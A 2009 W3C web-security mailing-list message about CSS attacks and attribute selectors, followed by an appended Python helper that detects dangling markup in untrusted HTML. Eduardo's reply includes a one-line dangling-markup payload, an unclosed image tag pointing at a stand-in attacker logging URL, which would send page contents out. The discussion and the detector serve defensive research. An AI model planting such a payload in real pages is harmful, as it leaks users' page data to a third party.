- From: <sird@rckc.at>
- Date: Tue, 8 Dec 2009 17:47:42 +0800
- To: Daniel Glazman <daniel@glazman.org>
- Cc: Adam Barth <w3c@adambarth.com>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
Received on Tuesday, 8 December 2009 09:48:45 UTC
@daniel, we are assuming the attacker can't inject JS, so has no access to the DOM.

On some browsers anyway, he could do <img src=' http://www.attacker.com/log?html= without closing the tag and fetch everything.. but maybe that's a new attack and needs a different thread as well.. hahaha

Greetings!!

-- Eduardo
http://www.sirdarckcat.net/
Sent from Hangzhou, 33, China

On Tue, Dec 8, 2009 at 5:42 PM, Daniel Glazman <daniel@glazman.org> wrote:
> Adam Barth wrote:
>>>> 3. kill attribute selectors; will never happen, period.
>>
>> Can you elaborate on this point? Why is this off the table?
>
> Because millions of people use it? Because millions of web sites
> use it? Because the feature is absolutely needed by them and it's
> not the right thing to do?
>
>> I don't understand why that would help. Wouldn't the attacker simply
>> load their stylesheet in a non-sandboxed mode?
>
> If the attacker has the ability to load in non-sandboxed mode, he/she
> has the ability to (a) create a <link> or <style> element and then CSS
> is the least problem since the attacker has access to the whole DOM
> (b) be a man-in-between and replace a linked stylesheet by his/her own;
> again, if he/she can do that, targeting JS is a much better option.
>
> </Daniel>
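As an added example (not code from Eduardo, Daniel, or the thread), here is a check a defender could run over untrusted HTML fragments before they are rendered, flagging the dangling `<img src='` case Eduardo describes: a tag that never closes, or an attribute value whose quote is never closed, would swallow the markup that follows it. The `example.invalid` host in the constructed input is a placeholder.

```python
"""Flag dangling markup in an HTML fragment (constructed helper)."""
import re
from typing import List

# An opening tag: '<' followed by a tag name (closing tags like </p> are skipped).
TAG_START = re.compile(r"<[A-Za-z][^\s/>]*")


def find_dangling_markup(fragment: str) -> List[str]:
    """Return findings for tags that never close or attribute quotes that never close.

    An empty list means every opening tag in the fragment is properly terminated.
    """
    findings = []
    pos = 0
    while True:
        match = TAG_START.search(fragment, pos)
        if not match:
            break
        i = match.end()
        quote = None       # the quote character currently open, if any
        closed = False     # did we reach the tag's '>' outside any quote?
        while i < len(fragment):
            ch = fragment[i]
            if quote:
                if ch == quote:      # closing quote of the attribute value
                    quote = None
            elif ch in ("'", '"'):   # opening quote of an attribute value
                quote = ch
            elif ch == ">":          # tag terminated outside of any quote
                closed = True
                break
            i += 1
        if quote:
            findings.append(
                f"unterminated {quote} attribute value in tag at offset "
                f"{match.start()}: {match.group(0)!r}"
            )
        elif not closed:
            findings.append(
                f"tag at offset {match.start()} never closes: {match.group(0)!r}"
            )
        # An unterminated tag consumes the rest of the fragment, so stop there.
        pos = i + 1 if closed else len(fragment)
    return findings


if __name__ == "__main__":
    # Constructed sample: the dangling tag swallows the paragraph after it.
    sample = "<img src='http://example.invalid/log?html= <p>account data</p>"
    for finding in find_dangling_markup(sample):
        print(finding)
```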